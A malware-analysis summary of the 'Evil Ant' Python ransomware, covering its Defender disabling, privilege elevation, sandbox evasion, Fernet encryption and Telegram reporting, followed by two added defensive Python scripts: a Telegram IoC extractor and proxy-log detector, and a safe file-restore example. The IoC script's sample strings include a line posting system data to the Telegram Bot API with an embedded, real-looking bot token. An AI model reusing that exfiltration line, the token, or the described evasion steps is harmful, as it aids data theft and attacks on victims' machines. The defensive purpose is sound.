Keypoints
- Sample is a Python application packaged with PyInstaller; pyc files were extracted and s13.pyc identified as the entry point.
- Ransomware hides its console window via Windows DLL APIs and attempts to relaunch itself with administrative privileges using the ‘runas’ verb and ShellExecuteW.
- It disables Windows Defender by executing a PowerShell command and checks PROCESSOR_IDENTIFIER to avoid running in virtualized/sandbox environments.
- System and IP information are sent to a Telegram bot via the Telegram API using an embedded bot token and channel ID.
- Files are encrypted using a Fernet-generated key stored in a global variable; ALL() enumerates drives and targets specific directories, and bak() encrypts .bak files.
- The sample changes the desktop wallpaper and displays a blue-screen style ransom UI with an unlock input that must match a hard-coded key for decryption.
- Decryption is implemented using the same Fernet key, but interrupting the process (e.g., shutting down mid-decrypt) can permanently prevent recovery.
MITRE Techniques
- [T1027] Obfuscated Files or Information – Use of PyInstaller packing to conceal Python bytecode (‘Evil Ant ransomware is packed by pyinstaller’).
- [T1059.001] Command and Scripting Interpreter: PowerShell – Uses PowerShell to modify system defenses (‘disables Windows Defender by executing a PowerShell command’).
- [T1562.001] Impair Defenses: Disable or Modify Tools – Disables Windows Defender to avoid detection (‘disables Windows Defender by executing a PowerShell command’).
- [T1548] Abuse Elevation Control Mechanism – Attempts to obtain administrative privileges by relaunching with the ‘runas’ verb via ShellExecuteW (‘the use of the "runas" verb along with ShellExecuteW API … the program can be relaunched with administrative privilege’).
- [T1497.001] Virtualization/Sandbox Detection – Detects and exits on virtualized environments by checking system environment variables (‘examining the environment variable PROCESSOR_IDENTIFIER and exits … If it is executed on the virtual machine, it exits without being executed’).
- [T1071.001] Application Layer Protocol: Web Protocols – Exfiltrates system and IP information by calling the Telegram API (‘IP and system information are being sent to a Telegram bot through the Telegram API’).
- [T1486] Data Encrypted for Impact – Encrypts victim files using a Fernet-generated key stored globally (‘uses an auto generated key using Fernet to encrypt the file contents’).
Indicators of Compromise
- [Hash] Detection context – ac612b8f09ec1f9d87a16873f27e15f0 (labeled Trojan / detection entry in article)
- [C2 / Telegram] Command-and-control context – bot token 6893451039:AAGMOfYl9-RF8rfOKQUSizMAqvr28TKmgpY, channel ID -1002134979192, and API URL https://api[.]telegram[.]org/bot6893451039:AAGMOfYl9-RF8rfOKQUSizMAqvr28TKmgpY/sendMessage
- [Email] Actor contact – [email protected]
- [Crypto payment] Ransom payment address – Bitcoin 3CLUhZqfXmM8VUHhR3zTgQ8wKY72cSn989
The technical entry point was a PyInstaller-packed Python binary; analysts extracted pyc modules (notably s13.pyc) and decompiled them to reveal runtime logic. The sample hides its console by calling Windows DLL APIs and uses ShellExecuteW with the ‘runas’ verb to relaunch with elevated privileges when necessary. It contains guardrails to detect virtualized or analysis environments by inspecting PROCESSOR_IDENTIFIER and will exit if it identifies a VM.
To evade detection and report back, the malware runs a PowerShell command that disables Windows Defender and posts system and IP details to a Telegram bot through the Telegram API, using an embedded bot token and channel ID. For impact, it generates a Fernet key (stored in a global variable by MAGIC()), enumerates drives and user paths with an ALL() routine, and encrypts the targeted files with the Fernet library; .bak files are handled by a separate bak() function. It also changes the desktop wallpaper and presents a blue-screen style ransom UI that accepts an unlock key.
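The Telegram exfiltration step leaves two things a defender can act on: the artefacts embedded in the sample (bot token, channel ID, Bot API URL) and the outbound request itself. The script below is an added example, not code from the K7 write-up or from the sample, that pulls those artefacts out of strings recovered from a decompiled module and flags proxy log lines that hit the Bot API. The token, channel ID and URL are the values from the IoC section above; the surrounding sample strings, the proxy log lines and the regex formats (Bot API tokens as "<bot id>:<35-character secret>", channel IDs as "-100" followed by ten digits) are assumptions for illustration.

```python
import re
from typing import Dict, List

# Constructed stand-in for strings dumped from the decompiled entry module
# (the kind of material a pyc decompiler or `strings` yields). The token,
# channel ID and URL are the values listed in the IoC section; the other
# lines are invented for illustration.
SAMPLE_STRINGS = """
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
TOKEN = '6893451039:AAGMOfYl9-RF8rfOKQUSizMAqvr28TKmgpY'
CHAT_ID = '-1002134979192'
url = 'https://api.telegram.org/bot' + TOKEN + '/sendMessage'
FALLBACK = 'https://api.telegram.org/bot6893451039:AAGMOfYl9-RF8rfOKQUSizMAqvr28TKmgpY/sendMessage'
requests.post(url, data={'chat_id': CHAT_ID, 'text': info})
"""

# Constructed proxy log lines for the detection check below.
SAMPLE_PROXY_LOG = [
    "2024-03-05T10:12:01Z 10.0.0.15 POST https://api.telegram.org/bot6893451039:AAGMOfYl9-RF8rfOKQUSizMAqvr28TKmgpY/sendMessage 200",
    "2024-03-05T10:12:03Z 10.0.0.15 GET https://updates.example.com/manifest.json 200",
    "2024-03-05T10:12:09Z 10.0.0.22 GET https://www.example.com/ 200",
]

# Bot API tokens look like "<bot id>:<35-character secret>" (assumed format).
BOT_TOKEN_RE = re.compile(r"(\d{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
# Channel/supergroup IDs as the Bot API expects them: "-100" + 10 digits (assumed format).
CHANNEL_ID_RE = re.compile(r"(?<![\w-])(-100\d{10})(?!\d)")
# Any Bot API endpoint, whether or not the token is inlined in the URL.
API_URL_RE = re.compile(r"https?://api\.telegram\.org/bot[^\s'\"]*")


def defang(value: str) -> str:
    """Neutralise a URL for a report so it cannot be clicked or auto-linked."""
    return value.replace("http", "hxxp").replace(".", "[.]")


def extract_telegram_iocs(text: str) -> Dict[str, List[str]]:
    """Pull Telegram C2 artefacts out of strings recovered from a sample.
    Values are de-duplicated and URLs defanged, ready for an IoC list."""
    return {
        "bot_tokens": sorted(set(BOT_TOKEN_RE.findall(text))),
        "channel_ids": sorted(set(CHANNEL_ID_RE.findall(text))),
        "api_urls": sorted({defang(u) for u in API_URL_RE.findall(text)}),
    }


def flag_bot_api_requests(log_lines: List[str]) -> List[str]:
    """Return proxy log lines that reach the Telegram Bot API. Workstations
    rarely have a legitimate reason to call api.telegram.org/bot<token>/...,
    so a hit is a cheap, high-signal trigger for the exfiltration step."""
    return [line for line in log_lines if API_URL_RE.search(line)]


if __name__ == "__main__":
    import json
    print(json.dumps(extract_telegram_iocs(SAMPLE_STRINGS), indent=2))
    for hit in flag_bot_api_requests(SAMPLE_PROXY_LOG):
        print("ALERT:", hit)
```

The extracted token is the value to block or report; the URL check is the one worth turning into a proxy or DNS rule, since it fires regardless of which bot or channel a later variant uses.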
Decryption is implemented: an unlock() function uses the same Fernet key to read each encrypted file in binary mode, decrypt it, and write the original content back in place. A hard-coded unlock key must match the user's input before decryption starts, and the routine is fragile: if it is interrupted (for example by a shutdown) while files are being rewritten, the decryption can fail permanently. Read more: https://labs.k7computing.com/index.php/python-ciphering-delving-into-evil-ants-ransomwares-tactics/
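The fragility noted above matters to anyone writing a recovery tool for this family: if the encrypted file is truncated before the plaintext is fully written, an interruption destroys both versions. The following is an added example, not code from the write-up or from the sample, that puts the fragile rewrite-in-place pattern next to an atomic variant (write to a temp file in the same directory, fsync, then os.replace) and simulates an interruption against both. The decrypt callable is pluggable; toy_transform is a constructed self-inverse stand-in used only so the example runs without the cryptography package, and Fernet(key).decrypt has the same bytes-to-bytes signature and would slot in unchanged.

```python
import os
import tempfile
from pathlib import Path
from typing import Callable

Decryptor = Callable[[bytes], bytes]  # Fernet(key).decrypt fits this signature

SAMPLE_PLAINTEXT = b"constructed contents of quarterly-report.bak"


def toy_transform(data: bytes) -> bytes:
    """Constructed, self-inverse stand-in for Fernet so the example runs offline.
    In real use pass decrypt=Fernet(key).decrypt instead."""
    return bytes(b ^ 0x5A for b in data)


def interrupted(_: bytes) -> bytes:
    """Stand-in for a shutdown or crash while a file is being processed."""
    raise RuntimeError("simulated shutdown mid-decrypt")


def rewrite_in_place(path: Path, decrypt: Decryptor) -> None:
    """The fragile pattern: truncate the encrypted file, then write plaintext.
    Anything that stops the process between open() and a complete write()
    leaves a zero-length or partial file, and the ciphertext is gone too."""
    ciphertext = path.read_bytes()
    with open(path, "wb") as f:          # truncates immediately
        f.write(decrypt(ciphertext))     # interruption here = data lost


def restore_file_atomically(path: Path, decrypt: Decryptor) -> None:
    """Hardened pattern: never touch the encrypted file until the full
    plaintext is durably on disk, then swap it in with an atomic rename."""
    plaintext = decrypt(path.read_bytes())   # a failure here changes nothing
    fd, tmp_name = tempfile.mkstemp(dir=path.parent, prefix=path.name + ".")
    try:
        with os.fdopen(fd, "wb") as tmp:
            tmp.write(plaintext)
            tmp.flush()
            os.fsync(tmp.fileno())
        os.replace(tmp_name, path)           # atomic on POSIX and NTFS
    except BaseException:
        try:
            os.unlink(tmp_name)              # drop the partial temp file
        except FileNotFoundError:
            pass
        raise


def demo() -> dict:
    """Run both patterns into an interruption and report what survives."""
    with tempfile.TemporaryDirectory() as d:
        ciphertext = toy_transform(SAMPLE_PLAINTEXT)
        fragile = Path(d, "fragile.bak")
        atomic = Path(d, "atomic.bak")
        fragile.write_bytes(ciphertext)
        atomic.write_bytes(ciphertext)

        for fn, target in ((rewrite_in_place, fragile), (restore_file_atomically, atomic)):
            try:
                fn(target, interrupted)
            except RuntimeError:
                pass                         # machine comes back up; retry below

        result = {
            "fragile_after_interrupt": fragile.read_bytes(),
            "atomic_after_interrupt": atomic.read_bytes(),
        }
        # Only the atomic copy still holds ciphertext, so only it can be retried.
        restore_file_atomically(atomic, toy_transform)
        result["atomic_recovered"] = atomic.read_bytes()
        result["stray_temp_files"] = sorted(
            p.name for p in Path(d).iterdir() if p.name not in ("fragile.bak", "atomic.bak")
        )
        return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Running demo() shows the fragile copy reduced to an empty file after the simulated shutdown, while the atomic copy still holds its ciphertext and recovers cleanly on retry, with no temp files left behind.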